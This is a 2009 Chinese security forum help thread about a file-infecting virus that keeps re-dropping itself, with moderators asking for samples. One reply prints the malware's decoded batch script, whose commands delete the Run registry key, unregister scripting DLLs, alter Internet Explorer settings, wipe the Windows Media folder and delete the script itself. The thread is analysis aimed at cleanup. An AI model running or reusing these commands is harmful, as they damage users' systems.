12   1  /  2  页   跳转

[求助] 病毒感染应用程序不会清理,,

收藏
crowemu
头像
初生襁褓狮
  • 帖子:15
  • 注册: 2007-03-10
  • 来自:
发表于: 2009-12-11 13:41 | 只看楼主 短消息 资料
字号: 1楼

病毒感染应用程序不会清理,,

病毒在program files文件夹下释放病毒文件夹,同时加到系统启动文件夹中(好原始
同时在服务项内添加
[MVBLSMP9IZM5 / MVBLSMP9IZM5][Stopped/Auto Start]
  <C:\Program Files\723SGNQEM\266T440.exe -2YITY4XVVZUL><ReaperFarrow>
类似服务

封闭任务管理器
删除进程和病毒程序后电脑恢复正常。。但是病毒似乎感染了应用程序。。在D,E盘启动任何一个应用程序都会让病毒重新释放
同时可见应用程序旁边会出现隐藏的。。***.iso,***.sql文件。。请问如何处理。。谢谢各位。。
病毒前后被清除重新释放过。。所以日志和病毒名不太对的上……

用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)

附件附件:

文件名:SREngLOG12.log
下载次数:222
文件类型:application/octet-stream
文件大小:
上传时间:2009-12-11 13:40:59
描述:log

附件附件:

文件名:123.rar
下载次数:442
文件类型:application/x-rar-compressed
文件大小:
上传时间:2009-12-11 13:40:59
描述:rar
分享到:
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2009-12-11 14:05 | 短消息 资料
字号: 2楼

回复:病毒感染应用程序不会清理,,

以下文件一定找到发来看
C:\PROGRA~1\723SGN~1\FAWF95~1.EXE
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\IMBYU.pif
C:\Program Files\723SGNQEM\266T440.exe
D:\Downloads\Fetion2009.exe.lnk
C:\KJZEF0E.EXE
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 
夲號ヱ被ジ盜
头像
叱咤花甲狮
  • 帖子:7083
  • 注册: 2008-08-21
  • 来自:昆仑琼华派
论坛8周年活动礼物就爱不长大论坛9周年纪念冰激凌10温馨圣诞十周年国庆61周年十一周年勋章
发表于: 2009-12-11 22:38 | 短消息 资料
字号: 3楼

回复: 病毒感染应用程序不会清理,,

分裂者【感染型】
Sql全是82KB
但MD5不同

猜测是将某字节到某字节的内容复制出来然后将病毒代码写进去






以下代码


udkgdoraeudkgdorae
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
efqyegcbsxcurzulqbfon
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
hzdjxznvednayetshydmzmw
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
rcicyrxwunmanocvvyfidzsob
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
bwouykiqiveroeffwpmsnvksivqk
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
eytfzctswdkfiwpmapumso
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
osgxandlrmojbhwjgudgcvro
regsvr32.exe /u /s itss.dll
zulqbfonmflqrudif
regsvr32.exe /u /s scrrun.dll
boribyzgtcytrpmsotiv
lrwtcqsihkrfqzonynclkfaifdptan
regsvr32.exe /u /s msvidctl.dll
wljmviccvsshomjbknrkzvih
regsvr32.exe /s jscript.dll
gfpevbndrabpcxypwgbpstowte
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
jhupwtyxfchjglsmfutsr
del C:\WINDOWS\Media\*.* /Q
tbhhxmiytqlhzrkiijrkeyo
regsvr32.exe /u /s vbscript.dll
ednayetshydmzmwealsfiwxf
regsvr32.exe /u /s vbscript.dll
gyskyxeuvgjjmccztd
del %0
del %0
qaxdzppnrpnemgfsnmzqyqqmvsnod
exit






























附件附件:

文件名:5AZO6JQ.bat.rar
下载次数:165
文件类型:application/octet-stream
文件大小:
上传时间:2009-12-11 22:44:25
描述:rar

最后编辑夲號ヱ被ジ盜 最后编辑于 2009-12-11 22:44:25
gototop
 
crowemu
头像
初生襁褓狮
  • 帖子:15
  • 注册: 2007-03-10
  • 来自:
发表于: 2009-12-11 23:48 | 只看楼主 短消息 资料
字号: 4楼

回复: 病毒感染应用程序不会清理,,

那个日志里的部分病毒已经被清除找不到了
后来我同学上了网。。貌似又下载了新的病毒。。这里是我找到的全部病毒文件……

附件附件:

文件名:12332.rar
下载次数:207
文件类型:application/x-rar-compressed
文件大小:
上传时间:2009-12-12 0:23:55
描述:rar

附件附件:

文件名:2313.zip
下载次数:173
文件类型:application/zip
文件大小:
上传时间:2009-12-12 0:23:55
描述:zip

最后编辑crowemu 最后编辑于 2009-12-12 00:23:54
gototop
 
crowemu
头像
初生襁褓狮
  • 帖子:15
  • 注册: 2007-03-10
  • 来自:
发表于: 2009-12-12 00:00 | 只看楼主 短消息 资料
字号: 5楼

回复: 病毒感染应用程序不会清理,,

附件没发上去?
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2009-12-12 07:55 | 短消息 资料
字号: 6楼

回复:病毒感染应用程序不会清理,,

上传的样本大部分为零字节,应该是被杀毒软件清除了的。

另外的类似文件夹的那个属于文件夹病毒和这感染型病毒无关。

你这同学既然电脑在使用中这样容易中毒,说明也没去什么正规网站,估计也是到处溜达的人了。

一般这样的使用状况,你是没办法帮他阻止或清理病毒的。
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 
夲號ヱ被ジ盜
头像
叱咤花甲狮
  • 帖子:7083
  • 注册: 2008-08-21
  • 来自:昆仑琼华派
论坛8周年活动礼物就爱不长大论坛9周年纪念冰激凌10温馨圣诞十周年国庆61周年十一周年勋章
发表于: 2009-12-12 12:24 | 短消息 资料
字号: 7楼

回复: 病毒感染应用程序不会清理,,

那毒生成的就是0字节的

没看猫叔的分析?
楼上我的分析那里也有...
直接0字节





引用:
原帖由 天月来了 于 2009-12-12 7:55:00 发表
上传的样本大部分为零字节,应该是被杀毒软件清除了的。

另外的类似文件夹的那个属于文件夹病毒和这感染型病毒无关。

你这同学既然电脑在使用中这样容易中毒,说明也没去什么正规网站,估计也是到处溜达的人了。

一般这样的使用状况,你是没办法帮他阻止或清理病毒的。
gototop
 
crowemu
头像
初生襁褓狮
  • 帖子:15
  • 注册: 2007-03-10
  • 来自:
发表于: 2009-12-12 23:51 | 只看楼主 短消息 资料
字号: 8楼

回复:病毒感染应用程序不会清理,,

谢谢两位大大。。仔细看了分析。。可是还是没明白应该怎么办。。
呃还有之前他不是乱上网站。。是在百度上下歌时候就中毒了。。所以我觉得是我病毒没杀干净。。
于是今天重装了电脑。。重新点了应用程序。。发现生成的确实都是0字节文件了。。但是所以D.E盘的应用程序都无法启动。。我现在应该怎么办呢?
gototop
 
天月来了
头像
版主
  • 帖子:76904
  • 注册: 2007-02-06
  • 来自:
发表于: 2009-12-13 08:15 | 短消息 资料
字号: 9楼

回复:病毒感染应用程序不会清理,,

将你其他盘不能运行,或者运行后会创建零字节文件的程序压缩发几个来

最好是将应用程序旁边会出现隐藏的***.iso,***.sql文件和原应用程序一起压缩发来看。

加库的速度现在各家都跟不上那病毒的更新
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 
crowemu
头像
初生襁褓狮
  • 帖子:15
  • 注册: 2007-03-10
  • 来自:
发表于: 2009-12-16 09:36 | 只看楼主 短消息 资料
字号: 10楼

回复:病毒感染应用程序不会清理,,

是这样。。所有iso和sql文件都被我删掉了忘记备份了。。呃。。
然后应用程序都是诸如飞信安装程序一类的东西。。我们论坛好像有上传文件的最大限制。。好像太大了发不上来呃
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT